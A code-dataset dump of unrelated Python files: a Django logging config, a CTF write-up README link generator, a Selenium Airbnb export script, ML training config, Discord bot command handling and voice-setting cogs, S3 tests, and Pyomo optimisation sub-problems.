            # 'filename': 'C://Users//localperla331//PycharmProjects//log//signbankdebug.log',
        },
    },
    'loggers': {
        'django.request': {
            'handlers': ['console'],
            'level': 'DEBUG',
            'propagate': True,
        },
        'django.db.backends': {
            'handlers': ['console'],
            'level': 'DEBUG',
            'propagate': False,
        },
    },
}
# Turn on lots of logging
# DO_LOGGING = True
# LOG_FILENAME = "debug.log"
if DEBUG:
    # Setting up debug toolbar.
    MIDDLEWARE.append('debug_toolbar.middleware.DebugToolbarMiddleware')
    INSTALLED_APPS += ('debug_toolbar',)
| StarcoderdataPython |
3383559 | <gh_stars>0
import os
from os import listdir
from os.path import join, isdir, basename
import sys
# All write-ups live under this directory in the repository.
base_dir = 'CTFS-2021'
# URL prefix under which the repository is published (e.g. GitHub Pages).
prefix = '/ctf-writeups-2021'
# Relative path of the CTF to index, passed on the command line.
ctf_path = sys.argv[1]
full_path = join(prefix,base_dir,ctf_path)  # NOTE(review): unused here; link() recomputes it
def link(path):
    """Return a markdown H2 line linking *path* under the published prefix."""
    target = join(prefix, base_dir, path)
    return '## [{}]({}) \n'.format(basename(path), target)
rootfile = 'CTFS-2021/README.md'
# Append a link to the newly indexed CTF at the top-level README.
with open(rootfile,'a') as f:
    f.write(link(ctf_path))
def make_links(path):
    """Append navigation links (parent + each subdirectory) to the README.md
    of ``path`` (relative to ``base_dir``), then recurse into subdirectories.
    """
    print(path)
    # '..' first, so every README starts with a link back to its parent.
    directories = ['..']
    for i in listdir(join(base_dir,path)):
        if isdir(join(base_dir,path,i)):
            directories.append(i)
    with open(join(base_dir,path,'README.md'),'a') as f:
        for i in directories:
            f.write(link(join(path,i)))
    # Recurse into real subdirectories only (skip the '..' placeholder).
    for i in directories[1:]:
        print(i)
        make_links(join(path,i))
make_links(ctf_path)
| StarcoderdataPython |
11259082 | from selenium import webdriver
import pickle
import time
import os
"""
options = webdriver.ChromeOptions()
options.add_argument('--ignore-certificate-errors')
options.add_argument("--test-type")
options.binary_location = "/"
"""
profile = webdriver.FirefoxProfile()
profile.set_preference('browser.download.folderList', 2) # custom location
profile.set_preference('browser.download.manager.showWhenStarting', False)
profile.set_preference('browser.download.dir', os.getcwd())
profile.set_preference('browser.helperApps.neverAsk.saveToDisk', 'application/octet-stream')
driver = webdriver.Firefox(firefox_profile=profile)
driver.get('https://www.airbnb.it/hosting/reservations/upcoming')
cookies = pickle.load(open("cookiesairbnb.pkl", "rb"))
for cookie in cookies:
driver.add_cookie(cookie)
#print(cookie)
driver.get('https://www.airbnb.it/hosting/reservations/upcoming')
csvUrl='https://www.airbnb.it/hosting/reservations/export.csv?sort_field=status&sort_order=asc&status=accepted&tab=upcoming&page=1'
listaPaginePath='/html/body/div[3]/div/div[1]/div[2]/div/section/footer/div/nav/span/div/ul'
listaPagine=driver.find_element_by_xpath(listaPaginePath)
print(listaPagine.getSize())
#driver.get(csvUrl)
time.sleep(10)
pickle.dump( driver.get_cookies() , open("cookiesairbnb.pkl","wb"))
| StarcoderdataPython |
6440458 | import os
import logging
import codecs
# Directory where init_log_config() writes the training log file.
__log_dir='/home/aistudio/logs'
# Global training configuration. class_num, image_num and label_dict are
# placeholders here and are filled in by init_train_parameters() at import.
train_params = {
    "img_size": [3,224,224],
    "class_num": -1,
    "image_num": -1,
    "label_dict":{},
    "data_dir": '/home/aistudio/data/data504/vegetables',
    'train_list': 'train_labels.txt',
    'eval_list': 'eval_labels.txt',
    'label_list': 'label_list.txt',
    "continue_train": False,
    "pretrained": False,
    'pretrained_dir': '',
    'mode':'train',
    'num_epoch': 10,
    'batch_size': 64,
    'mean_rgb':[127.5,127.5,127.5],
    'use_gpu':False,
    'img_process_method': {
        'is_distort':True,
        'is_rotate':True,
        'is_crop':True,
        'is_flip':True,
        'hue_prob':0.5,
        'hue_delta':18,
        'contrast_prob':0.5,
        'contrast_delta':0.5,
        'saturation_prob':0.5,
        'saturation_delta':0.5,
        'brightness_prob':0.5,
        'brightness_delta':0.125
    },
    'early_stop': { # no place was found where this is actually used
        'sample_frequency':50,
        'successsive_limit':3,
        'good_acc': 0.92
    },
    'learning_strategy':{ # some of these parameters are unused
        'name':'cosins_decay',
        'epochs':[40,80,100],
        'steps':[0.1,0.01,0.001,0.0001]
    },
    'learning_rate':0.0125
}
def init_train_parameters():
    """Fill label_dict, class_num and image_num in the global train_params
    by reading the dataset's label list and training list files."""
    data_dir = train_params['data_dir']
    label_path = os.path.join(data_dir, train_params['label_list'])
    train_path = os.path.join(data_dir, train_params['train_list'])
    num_classes = 0
    with codecs.open(label_path, encoding='utf-8') as label_file:
        # Each line: "<index> <label-name>".
        for raw_line in label_file:
            parts = raw_line.strip().split()
            train_params['label_dict'][parts[1]] = int(parts[0])
            num_classes += 1
    train_params['class_num'] = num_classes
    with codecs.open(train_path, encoding='utf-8') as train_file:
        # One sample per line; only the count is needed.
        train_params['image_num'] = sum(1 for _ in train_file)
def init_log_config():
    """Configure the root logger to write to stderr and to a log file
    under __log_dir, and return it."""
    root = logging.getLogger()
    root.setLevel(logging.INFO)
    if not os.path.exists(__log_dir):
        os.mkdir(__log_dir)
    log_path = os.path.join(__log_dir, 'train_log.log')
    stream_handler = logging.StreamHandler()  # console output handler
    file_handler = logging.FileHandler(log_path, mode='w')
    file_handler.setLevel(logging.DEBUG)
    formatter = logging.Formatter(
        '{asctime:s} - {filename:s}[line:{lineno:d}] - {levelname:s} : {message:s}',
        style='{')
    file_handler.setFormatter(formatter)
    stream_handler.setFormatter(formatter)
    root.addHandler(file_handler)
    root.addHandler(stream_handler)
    return root
# Module-level side effects: configure logging and load dataset metadata.
logger = init_log_config()
init_train_parameters()
if __name__=='__main__':
    logger.info('successfully log')
    print(train_params)
| StarcoderdataPython |
1979075 |
from typing import ClassVar, TypeVar
from typing_extensions import Self
from dubious.discord import api, enums, make
from dubious.Interaction import Ixn, makeIxn
from dubious.Machines import Check, Command, Handle
from dubious.Pory import Chip, Pory
class Pory2(Pory):
    """ A collection of `Command`-wrapped methods that registers each method as
    a Discord Application Command. Also collects `Handle`s.
    Pre-defined is a method called when the `Chip` catches a `tcode.Ready`
    payload. This method automatically registers all `Command`s via the
    `http` api.
    Also pre-defined is a method called when the `Chip` catches a
    `tcode.InteractionCreate` payload. This method calls the coresponding
    `Command` method on this `Pory2`.
    For convenience, the `.TEST_IN` ClassVar will make all `Command`s in
    this Pory2 register in the guild with the specified ID. """
    # Mapping of command name -> Command, rebuilt per subclass below.
    commands: dict[str, Command]
    def __init_subclass__(cls):
        # Collect every Command-decorated method declared on the subclass.
        super().__init_subclass__()
        cls.commands = Command.collectByReference(cls)
    TEST_IN: ClassVar[api.Snowflake | str | int | None] = None
    supercommand: ClassVar[Command | None] = None
    doPrintCommands: ClassVar = True
    def printCommand(self, *message):
        """Print registration progress messages unless silenced."""
        if self.doPrintCommands:
            print(*message)
    def use(self, chip: Chip | Self):
        """Attach this Pory2 to a Chip or nest it under another Pory2."""
        if not isinstance(chip, Chip):
            # NOTE(review): this local `supercommand` is assigned but never
            # used -- possibly an unfinished nesting feature; confirm intent.
            supercommand = (
                chip.supercommand if chip.supercommand else
                Command.new(chip.__class__.__name__, "No descrpition provided.")
            )
        return super().use(chip)
    @Handle(enums.tcode.Ready, order = 5)
    async def _registerCommands(self, _):
        """On Ready: sync this class's Commands with Discord, deleting any
        remotely registered commands that no longer exist locally."""
        t_RegdCommands = dict[str, api.ApplicationCommand]
        t_GuildRegdCommands = dict[api.Snowflake, t_RegdCommands]
        def dictify(ls: list[api.ApplicationCommand]):
            # Index registered commands by name for O(1) lookup.
            return {command.name: command for command in ls}
        regdGlobally: t_RegdCommands = dictify(await self.http.getGlobalCommands())
        regdGuildly: t_GuildRegdCommands = {}
        for guildID in self.guildIDs:
            regdGuildly[guildID] = dictify(await self.http.getGuildCommands(guildID))
        for pendingCommand in self.__class__.commands.values():
            # TEST_IN redirects every command to a single test guild.
            if self.TEST_IN: pendingCommand.guildID = api.Snowflake(self.TEST_IN)
            await self._processPendingCommand(pendingCommand, regdGlobally, regdGuildly)
        # Anything left in the registered maps has no local counterpart.
        for remainingCommand in regdGlobally.values():
            self.printCommand(f"deleting `{remainingCommand.name}`")
            await self.http.deleteCommand(remainingCommand.id)
        for guildID in regdGuildly:
            for remainingGuildCommand in regdGuildly[guildID].values():
                self.printCommand(f"deleting `{remainingGuildCommand.name}` from guild {remainingGuildCommand.guild_id}")
                await self.http.deleteGuildCommand(guildID, remainingGuildCommand.id)
    async def _processPendingCommand(self,
        pendingCommand: make.Command,
        regdGlobally: dict[str,
            api.ApplicationCommand],
        regdGuildly: dict[api.Snowflake,
            dict[str,
                api.ApplicationCommand]]
    ):
        """Create, patch, or keep one local command against the registered
        sets; pops matches so leftovers can be deleted by the caller."""
        if pendingCommand.guildID:
            if not pendingCommand.guildID in regdGuildly:
                self.printCommand(f"creating `{pendingCommand.name}` in guild {pendingCommand.guildID}")
                return await self.http.postGuildCommand(pendingCommand.guildID, pendingCommand)
            regdCommands = regdGuildly[pendingCommand.guildID]
            if not pendingCommand.name in regdCommands:
                self.printCommand(f"creating `{pendingCommand.name}` in guild {pendingCommand.guildID}")
                return await self.http.postGuildCommand(pendingCommand.guildID, pendingCommand)
            regdCommand = regdCommands.pop(pendingCommand.name)
            if pendingCommand.eq(regdCommand):
                self.printCommand(f"matched `{pendingCommand.name}` in guild {pendingCommand.guildID}")
                return
            self.printCommand(f"patching `{pendingCommand.name}` in guild {pendingCommand.guildID}")
            return await self.http.patchGuildCommand(pendingCommand.guildID, regdCommand.id, pendingCommand)
        if not pendingCommand.name in regdGlobally:
            self.printCommand(f"creating `{pendingCommand.name}`")
            return await self.http.postCommand(pendingCommand)
        regdCommand = regdGlobally.pop(pendingCommand.name)
        if pendingCommand.eq(regdCommand):
            self.printCommand(f"matched `{pendingCommand.name}`")
            return
        self.printCommand(f"patching `{pendingCommand.name}`")
        return await self.http.patchCommand(regdCommand.id, pendingCommand)
    @Handle(api.tcode.InteractionCreate)
    async def _interaction(self, interaction: api.Interaction):
        """Dispatch an incoming interaction to the matching chat command."""
        if interaction.data:
            ixn = makeIxn(interaction, self.http)
            if interaction.type == enums.InteractionEventTypes.ApplicationCommand:
                match interaction.data.type:
                    case enums.ApplicationCommandTypes.ChatInput:
                        await self._chatInput(ixn, interaction.data)
    async def _chatInput(self, ixn: Ixn, data: api.InteractionData):
        """Resolve the named Command, build its kwargs, and invoke it."""
        if not data.name: raise AttributeError()
        command = self.__class__.commands.get(data.name)
        if not command: raise RuntimeError(f"Tried to run callback for command {data.name} but no callback existed.")
        params = self._processOptions(command, data, data.resolved)
        await command.call(self, ixn, **params)
    def _processOptions(self,
        command: Command,
        data: api.InteractionData | api.InteractionCommandDataOption,
        resolved: api.InteractionCommandDataResolved | None,
        params: dict | None = None
    ):
        """Recursively flatten interaction options (incl. subcommands) into
        a kwargs dict keyed by option name."""
        if not params: params = {}
        if not data.options: return params
        for option in data.options:
            if option.type in [
                enums.CommandOptionTypes.SubCommand,
                enums.CommandOptionTypes.SubCommandGroup
            ]:
                # Subcommands carry nested options; recurse into them.
                param = self._processOptions(command, option, resolved, params)
            else:
                param = self._getParamsForCommand(command, option, resolved)
            params[option.name] = param
        return params
    def _getParamsForCommand(self,
        command: Command,
        option: api.InteractionCommandDataOption,
        resolved: api.InteractionCommandDataResolved | None
    ):
        """Convert one raw option value into the argument the Command
        expects, resolving IDs to User/Member/Role/Channel objects."""
        hint = command.getOption(option.name)
        if not hint: raise ValueError(f"Function for Command `{command.reference()}` got unexpected option `{option.name}`")
        param = option.value
        # We have to fix up the Member objects to include the users that have been resolved alongside them.
        if resolved and resolved.members:
            if not resolved.users: resolved.users = {}
            for memberID, member in resolved.members.items():
                if memberID in resolved.users:
                    member.user = resolved.users[memberID]
        t_Resolved = TypeVar("t_Resolved", bound=api.Disc)
        def _cast(resolvedObjects: dict[api.Snowflake, t_Resolved] | None):
            # Look up the option's snowflake ID in the resolved-object map.
            if resolvedObjects is None: raise AttributeError()
            if not isinstance(option.value, (int, str)):
                raise ValueError(f"Function for command `{command.reference()}` got an unknown option value (`{option.value}`) for option `{option.name}`")
            id_ = api.Snowflake(option.value)
            if id_ in resolvedObjects:
                return resolvedObjects[id_]
            else:
                raise ValueError(f"Function for command `{command.reference()}` couldn't find a resolved object for option `{option.name}`")
        match hint.type:
            case enums.CommandOptionTypes.User:
                param = _cast(resolved.users if resolved else None)
            case enums.CommandOptionTypes.Member:
                param = _cast(resolved.members if resolved else None)
            case enums.CommandOptionTypes.Role:
                param = _cast(resolved.roles if resolved else None)
            case enums.CommandOptionTypes.Channel:
                param = _cast(resolved.channels if resolved else None)
            case enums.CommandOptionTypes.Mentionable:
                # Mentionables stay as bare snowflakes (user OR role ID).
                if not isinstance(param, (int, str)): raise ValueError()
                param = api.Snowflake(param)
            case enums.CommandOptionTypes.SubCommand | enums.CommandOptionTypes.SubCommandGroup:
                param = option
        return param
| StarcoderdataPython |
3383413 | <filename>tests/s3_manager_test.py<gh_stars>0
import pytest
from logger import logger
from ..manager.s3_manager import download_from_s3, upload_to_s3_repo_sofr
@pytest.mark.skip(reason="temp")
def test_download_from_s3():
download_path = "/tmp/package.zip"
s3_path = "s3://eternity02.deployment/lambda/data-collector-repo-sofr-app/deployment/package.zip"
download_from_s3(s3_path, download_path)
@pytest.mark.skip(reason="temp")
def test_upload_to_s3():
upload_path = 'data-collector-repo-sofr-app.zip'
filename = 'data-collector-repo-sofr-app.zip'
upload_to_s3_repo_sofr(upload_path, filename) | StarcoderdataPython |
11285478 | """Implements and manages all sub-problems"""
import logging
from abc import ABC
import numpy as np
from pyomo.core import ConcreteModel, Param, RangeSet, Var, ConstraintList, \
Objective, minimize, maximize
from pyomo.core.expr.visitor import identify_variables, replace_expressions
from pyomo.environ import Binary, Integers, Reals, SolverStatus, \
TerminationCondition
from pyomo.opt import SolverFactory
logger = logging.getLogger('decogo')
class PyomoSubProblemBase(ABC):
    """Base class for constructing the Pyomo model of a single block
    sub-problem. Builds the block variables with their bounds/domains and
    the local linear and nonlinear constraints.

    :param sub_models: Collection of sub-models, indexable by block id
    :param cuts: Cut pool holding block sizes, local/global cuts and the
        objective data
    :param block_id: Block identifier
    :type block_id: int
    """

    def __init__(self, sub_models, cuts, block_id):
        """Constructor method"""
        super().__init__()
        self.block_id = block_id
        # BUGFIX: keep the whole collection as well -- update_var_lower_bound
        # and update_var_upper_bound index self.sub_models[k], which
        # previously did not exist and raised AttributeError.
        self.sub_models = sub_models
        self.sub_model = sub_models[block_id]
        self.cuts = cuts
        self.model = ConcreteModel()
        self.model.Y = Var(RangeSet(cuts.block_sizes[block_id]))
        # Initialize value, bounds and domain of every block variable from
        # the sub-model description (Pyomo vars are 1-indexed here).
        for n in range(1, self.sub_model.block_size + 1):
            lb = self.sub_model.variables[n - 1].lower_bound
            self.model.Y[n].value = lb
            self.model.Y[n].setlb(lb)
            ub = self.sub_model.variables[n - 1].upper_bound
            self.model.Y[n].setub(ub)
            if self.sub_model.variables[n - 1].type == "Binary":
                self.model.Y[n].domain = Binary
                self.model.Y[n].value = 0
            elif self.sub_model.variables[n - 1].type == "Integers":
                self.model.Y[n].domain = Integers
            else:
                self.model.Y[n].domain = Reals
        self.model.lin_con = ConstraintList()

        def lin_con_rule(model, k, m):
            # Linear expression of local cut m of block k over this
            # block's variables.
            return sum(cuts.local_cuts[k][m].lhs[self.block_id, n] *
                       model.Y[n + 1] for n in range(sub_models[k].block_size))

        # Instantiate all local linear cuts of this block.
        for m, local_constr in enumerate(cuts.local_cuts[block_id]):
            if local_constr.relation == "<=":
                self.model.lin_con.add(expr=lin_con_rule(self.model, block_id,
                                                         m) <= local_constr.rhs)
            elif local_constr.relation == "=":
                self.model.lin_con.add(expr=lin_con_rule(self.model, block_id,
                                                         m) == local_constr.rhs)
            elif local_constr.relation == ">=":
                self.model.lin_con.add(expr=lin_con_rule(self.model, block_id,
                                                         m) >= local_constr.rhs)
        # Clone each nonlinear constraint and re-target its variables onto
        # this model's Y variables.
        self.model.nonlin_constr = ConstraintList()
        for constr in self.sub_model.nonlin_constr:
            expr = constr.expr.clone()
            vars_in_expr = identify_variables(expr)
            substitution_map = {}  # maps original var objects to model.Y
            for var in vars_in_expr:
                index = self.sub_model.vars_in_block.index(var.name)
                substitution_map[id(var)] = self.model.Y[index + 1]
            new_expr = replace_expressions(expr, substitution_map)
            self.model.nonlin_constr.add(expr=new_expr)

    def solve(self, solver_name, start_point=None, solver_options=None):
        """Base method for calling the external solver to solve the model.

        :param solver_name: External solver name
        :type solver_name: str
        :param start_point: Starting point for the solver, defaults to ``None``
        :type start_point: ndarray or None
        :param solver_options: Options for external solver as (name, value)
            pairs, defaults to ``None``
        :type solver_options: list
        :return: Solution point, primal bound, dual bound, flag if the primal \
        bound is feasible
        :rtype: tuple
        """
        if start_point is not None:
            for i in range(len(self.model.Y)):
                self.model.Y[i + 1].value = start_point[i]
        opt = SolverFactory(solver_name)

        def recursive_solve(opt_recursive, options=None, iter_i=10):
            # Try to solve; on a ValueError from the solver interface retry
            # with a reduced iteration limit until the limit gets too small.
            solver_error = False
            try:
                if options is not None:
                    # BUGFIX: iterate the *options* argument of this call,
                    # not the outer solver_options (which broke the retry
                    # path that passes a reduced max_iter).
                    for key, value in options:
                        opt_recursive.options[key] = value
                result_recursive = opt_recursive.solve(self.model, tee=False)
            except ValueError as error:
                logger.info(error)
                if iter_i - 2 < 6:
                    logger.info('error: cannot solve')
                    solver_error = True
                    result_recursive = None
                else:
                    logger.info('solve: max_iter = {0}'.format(iter_i - 2))
                    # BUGFIX: options must be an iterable of (key, value)
                    # pairs; the original passed a flat 2-tuple that could
                    # not be unpacked.
                    result_recursive, solver_error = \
                        recursive_solve(opt_recursive,
                                        options=[('max_iter', iter_i - 2)],
                                        iter_i=iter_i - 2)
            return result_recursive, solver_error

        results, error_in_solver = recursive_solve(opt, solver_options)
        sol_is_feasible = True
        dual_bound = None
        primal_bound = None
        y_new = np.zeros(shape=len(self.model.Y))
        if error_in_solver:
            sol_is_feasible = False
        else:
            if results.solver.status == SolverStatus.ok:
                sol_is_feasible = True
            elif results.solver.status == SolverStatus.warning:
                if results.solver.termination_condition == \
                        TerminationCondition.infeasible:
                    sol_is_feasible = False
                    logger.info(self.model.name + ' is infeasible')
                elif results.solver.termination_condition == \
                        TerminationCondition.maxIterations:
                    sol_is_feasible = False
            for i in range(len(self.model.Y)):
                y_new[i] = self.model.Y[i + 1].value
            primal_bound = self.model.obj.expr()
            # by default dual bound is equal to primal bound
            dual_bound = primal_bound
            if solver_name == 'scip' and solver_options is not None:
                # SCIP reports a genuine dual bound in its log; parse it out.
                log_lines = opt._log.split('\n')
                for line in log_lines:
                    if line.startswith('Dual Bound'):
                        dual_bound = float(line.split(':')[1].strip())
        return y_new, primal_bound, dual_bound, sol_is_feasible

    def add_linear_constraint(self):
        """Adds the most recently generated local linear cut to the model."""

        def lin_con_rule(model, constr):
            return sum(constr.lhs[self.block_id, n] * model.Y[n + 1]
                       for n in
                       range(self.cuts.block_sizes[self.block_id]))

        constr = self.cuts.local_cuts[self.block_id][
            -1]  # this takes the last one
        if constr.relation == "<=":
            self.model.lin_con.add(
                expr=lin_con_rule(self.model, constr) <= constr.rhs)
        elif constr.relation == "=":
            self.model.lin_con.add(
                expr=lin_con_rule(self.model, constr) == constr.rhs)
        elif constr.relation == ">=":
            self.model.lin_con.add(
                expr=lin_con_rule(self.model, constr) >= constr.rhs)

    def set_nlp(self):
        """Relaxes integer/binary variables to continuous (NLP relaxation)."""
        for i, var_domain in enumerate(self.sub_model.variables):
            if var_domain.type in ("Integers", "Binary"):
                self.model.Y[i + 1].domain = Reals

    def unset_nlp(self):
        """Restores the integer/binary domains for the variables that are
        integral in the original formulation."""
        for i, var_domain in enumerate(self.sub_model.variables):
            if var_domain.type == "Integers":
                self.model.Y[i + 1].domain = Integers
            elif var_domain.type == "Binary":
                self.model.Y[i + 1].domain = Binary

    def update_var_lower_bound(self, index):
        """Updates the lower bound of the variable. The value is taken from
        the corresponding sub-model.

        :param index: Index (block_id, index)
        :type index: tuple
        """
        k, i = index
        self.model.Y[i + 1].setlb(
            self.sub_models[k].variables[i].lower_bound)

    def update_var_upper_bound(self, index):
        """Updates the upper bound of the variable. The value is taken from
        the corresponding sub-model.

        :param index: Index (block_id, index)
        :type index: tuple
        """
        k, i = index
        self.model.Y[i + 1].setub(
            self.sub_models[k].variables[i].upper_bound)

    def fix_integers(self, x):
        """Fixes integer and binary variables at the given values.

        :param x: Given array
        :type x: ndarray
        """
        for i, var in enumerate(self.sub_model.variables):
            # BUGFIX: was 'Integer' (singular), which never matches the
            # 'Integers' type tag used everywhere else, so integer
            # variables were silently left unfixed.
            if var.type == 'Integers' or var.type == 'Binary':
                self.model.Y[i + 1].value = x[i]
                self.model.Y[i + 1].fix()

    def unfix_integers(self):
        """Unfixes all integer and binary variables."""
        for i, var in enumerate(self.sub_model.variables):
            if var.type == 'Integers' or var.type == 'Binary':
                self.model.Y[i + 1].unfix()

    def add_objective(self):
        """Sets the default objective function, i.e. :math:`c_k^Tx_k`, where
        :math:`c_k` is the partial objective from the original model.
        """

        def objective_rule(model):
            ans_obj = 0
            ans_obj += sum(
                self.cuts.obj.c[self.block_id, n] * model.Y[n + 1]
                for n in range(self.cuts.block_sizes[self.block_id]))
            ans_obj += self.cuts.obj.const
            return ans_obj

        self.model.del_component('obj')
        self.model.obj = Objective(rule=objective_rule, sense=minimize)

    def set_objective(self, direction):
        """Sets the objective function with the given direction vector.

        :param direction: Given vector
        :type direction: ndarray
        """
        new_obj_expr = sum(direction[n] * self.model.Y[n + 1]
                           for n in range(self.sub_model.block_size))
        self.model.del_component('obj')
        self.model.obj = Objective(expr=new_obj_expr)
class PyomoMinlpSubProblem(PyomoSubProblemBase):
    """Sub-problem minimising a linear objective over the block set.

    .. math::
        \\begin{equation}
        \\begin{split}
        \\min \\ &d_k^Ty_k, \\newline
        &y_k \\in X_k, d_k \\in \\mathbb{R}^{n_k}
        \\end{split}
        \\end{equation}
    """

    def __init__(self, sub_models, cuts, block_id):
        """Delegates entirely to the base constructor; the objective is
        installed later via set_objective/add_objective."""
        super().__init__(sub_models, cuts, block_id)
class PyomoProjectionSubProblem(PyomoSubProblemBase):
    """Projection sub-problem: find the point of the block set closest
    (in squared Euclidean distance) to a fixed point.

    .. math::
        \\begin{equation}
        \\begin{split}
        \\min \\ &||y_k-x_k||^2,\\newline
        &y_k \\in G_k, x_k \\text{ is fixed}
        \\end{split}
        \\end{equation}
    """

    def __init__(self, sub_models, cuts, block_id):
        """Builds the base model plus the mutable projection point X."""
        super().__init__(sub_models, cuts, block_id)
        size = self.cuts.block_sizes[block_id]
        self.model.X = Param(RangeSet(size), mutable=True, initialize=0)
        self.model.obj = Objective(expr=self.obj_rule())
        self.model.name = 'Projection sub problem'

    def obj_rule(self):
        """Squared Euclidean distance between Y and the fixed point X.

        :return: Objective expression
        :rtype: Expression
        """
        return sum((self.model.Y[idx + 1] - self.model.X[idx + 1]) ** 2
                   for idx in range(self.sub_model.block_size))

    def set_projection_point(self, point_to_project):
        """Copies the given point into the mutable parameter X.

        :param point_to_project: Projection point
        :type point_to_project: ndarray
        """
        for idx in range(len(self.model.X)):
            self.model.X[idx + 1].value = point_to_project[idx]
class PyomoResourceProjectionSubProblem(PyomoSubProblemBase):
    """Resource-space projection sub-problem.

    .. math::
        \\begin{equation}
        \\begin{split}
        \\min \\ &||A_kx_k - w_k||^2,\\newline
        &y_k \\in G_k, w_k \\text{ is fixed}
        \\end{split}
        \\end{equation}
    """

    def __init__(self, sub_models, cuts, block_id):
        """Builds the base model plus the mutable resource target w
        (one entry per global cut plus one for the objective row)."""
        super().__init__(sub_models, cuts, block_id)
        self.model.w = Param(RangeSet(self.cuts.num_of_global_cuts + 1),
                             mutable=True, initialize=0)
        self.model.obj = Objective(expr=self.obj_rule())
        self.model.name = 'Resource projection sub problem'

    def obj_rule(self):
        """Sum of squared residuals between each resource row of Y and the
        corresponding fixed target w.

        :return: Objective expression
        :rtype: Expression
        """
        size = self.cuts.block_sizes[self.block_id]
        total = 0
        for j in range(self.cuts.num_of_global_cuts + 1):
            # Row 0 is the objective row; the rest are the global cuts.
            if j == 0:
                coeffs = self.cuts.obj.c
            else:
                coeffs = self.cuts.global_cuts[j - 1].lhs
            row = sum(coeffs[self.block_id, i] * self.model.Y[i + 1]
                      for i in range(size))
            total += (row - self.model.w[j + 1]) ** 2
        return total

    def set_projection_point(self, point_to_project):
        """Copies the given resource point into the mutable parameter w.

        :param point_to_project: Projection point
        :type point_to_project: ndarray
        """
        for idx in range(len(self.model.w)):
            self.model.w[idx + 1].value = point_to_project[idx]
class PyomoLineSearchSubProblem(PyomoSubProblemBase):
    """Line-search sub-problem between an exterior point
    :math:`x_k^{ext}` and an interior point :math:`x_k^{int}`.

    .. math::
        \\begin{equation}
        \\begin{split}
        \\max \\ & \\alpha, \\newline
        &y_k = \\alpha x_k^{ext} + (1 - \\alpha) x_k^{int}, \\newline
        &y_k \\in X_k
        \\end{split}
        \\end{equation}
    """

    def __init__(self, sub_models, cuts, block_id):
        super().__init__(sub_models, cuts, block_id)
        # Local linear cuts do not apply to the line search.
        self.model.lin_con.deactivate()
        # Interpolation weight along the segment between the two points.
        self.model.alpha = Var(bounds=(0, 1), initialize=0, within=Reals)
        self.model.obj = Objective(expr=self.model.alpha, sense=maximize)
        size = self.cuts.block_sizes[block_id]
        self.model.interior_point = Param(RangeSet(size), mutable=True,
                                          initialize=0)
        self.model.exterior_point = Param(RangeSet(size), mutable=True,
                                          initialize=0)
        self.model.line_search_con = ConstraintList()
        # Tie every Y coordinate to the convex combination of the endpoints.
        for idx in range(size):
            ext = self.model.exterior_point[idx + 1]
            intr = self.model.interior_point[idx + 1]
            self.model.line_search_con.add(
                self.model.Y[idx + 1] == self.model.alpha * ext +
                (1 - self.model.alpha) * intr)

    def set_interior_exterior_points(self, exterior_point, interior_point):
        """Copies the two segment endpoints into the mutable parameters.

        :param exterior_point: Exterior point
        :type exterior_point: ndarray
        :param interior_point: Interior point
        :type interior_point: ndarray
        """
        for idx in range(self.cuts.block_sizes[self.block_id]):
            self.model.exterior_point[idx + 1].value = exterior_point[idx]
            self.model.interior_point[idx + 1].value = interior_point[idx]

    def solve(self, solver_name, start_point=None, solver_options=None):
        """Solves the sub-problem and returns ``(alpha, y_new)``. For more
        info, see base method :meth:`SubProblemBase.solve`.
        """
        y_new, _primal, _dual, _feasible = super().solve(
            solver_name, start_point=start_point,
            solver_options=solver_options)
        return self.model.alpha.value, y_new
| StarcoderdataPython |
3469218 | <filename>src/simplelayout/cli/__init__.py<gh_stars>0
from simplelayout.cli.cli_generate import get_options # noqa
| StarcoderdataPython |
1977173 | from discord.ext import commands
import discord
voice_setting = """
`::voice <音声の種類(A,B,C,Dのいずれか)>` で音声の種類を変更できます。
`::speed <スピード>` でスピードの変更ができます。デフォルトは1.0です。
`::pitch <ピッチ>` でピッチの変更ができます。デフォルトは0.0です。
"""
def yomiage(a): return '読み上げる' if a else '読み上げない'
class VoiceSetting(commands.Cog):
    # Cog for per-user TTS voice settings (type/speed/pitch) and per-guild
    # read-aloud preferences. Command docstrings double as discord.py help
    # text, so the user-facing Japanese strings are deliberately untouched.
    def __init__(self, bot):
        # `bot` is expected to expose `.db` (persistent settings store),
        # `.guild_setting` (cached per-guild config dict) and
        # `.update_guild_setting()` -- assumed from usage below; confirm
        # against the bot implementation.
        self.bot = bot
    @commands.group(invoke_without_command=True)
    async def voice(self, ctx, voice_type=None):
        """現在の音声設定を表示 voice_typeを指定すると変更"""
        # With no argument: show the caller's current settings in an embed.
        if voice_type is None:
            setting = await self.bot.db.get_user_setting(str(ctx.author.id))
            embed = discord.Embed(title=f"{ctx.author}さんの現在の音声設定")
            embed.add_field(name="音声の種類", value=f"{setting['voice']}")
            embed.add_field(name="スピード", value=f"{setting['speed']}")
            embed.add_field(name="ピッチ", value=f"{setting['pitch']}")
            embed.add_field(name="変更方法", value=voice_setting)
            await ctx.send(embed=embed)
            return
        # Accept the four voice types case-insensitively.
        if voice_type not in ["A", "B", "C", "D", "a", "b", "c", "d"]:
            await ctx.send("音声の種類はA,B,C,Dのいずれかで選択してください。")
            return
        # Persist the normalized (upper-case) voice type.
        # NOTE(review): the getter above is called with str(ctx.author.id)
        # but the setter with the raw int id -- verify that the db layer
        # normalizes keys consistently.
        await self.bot.db.set_user_setting(ctx.author.id, voice=voice_type.upper())
        await ctx.send(f'{ctx.author.mention}, 声の設定を{voice_type}に変更しました。')
    @commands.command()
    async def speed(self, ctx, speed: float):
        # Reading speed; accepted range is 0.25-4.0 (default 1.0 per the
        # module-level help text).
        if 0.25 <= speed <= 4.0:
            await self.bot.db.set_user_setting(ctx.author.id, speed=speed)
            await ctx.send(f"{ctx.author.mention}, スピードの設定を{speed}に変更しました。")
            return
        # NOTE(review): the condition accepts 0.25 but this error message
        # says 0.5 -- one of the two looks wrong; confirm intended range.
        await ctx.send("スピードは0.5から4.0の間で設定してください。")
    @commands.command()
    async def pitch(self, ctx, pitch: float):
        # Voice pitch; valid range -6.5..6.5 (default 0.0).
        if -6.5 <= pitch <= 6.5:
            await self.bot.db.set_user_setting(ctx.author.id, pitch=pitch)
            await ctx.send(f"{ctx.author.mention}, ピッチの設定を{pitch}に変更しました。")
            return
        await ctx.send('ピッチは-6.5から6.5の間で設定してください。')
    @commands.group(invoke_without_command=True, aliases=['pref'])
    async def setting(self, ctx):
        # With no subcommand: dump the guild's current read-aloud settings.
        await ctx.send(f"botのメッセージを読み上げるか: {self.bot.guild_setting[ctx.guild.id]['bot']}\n"
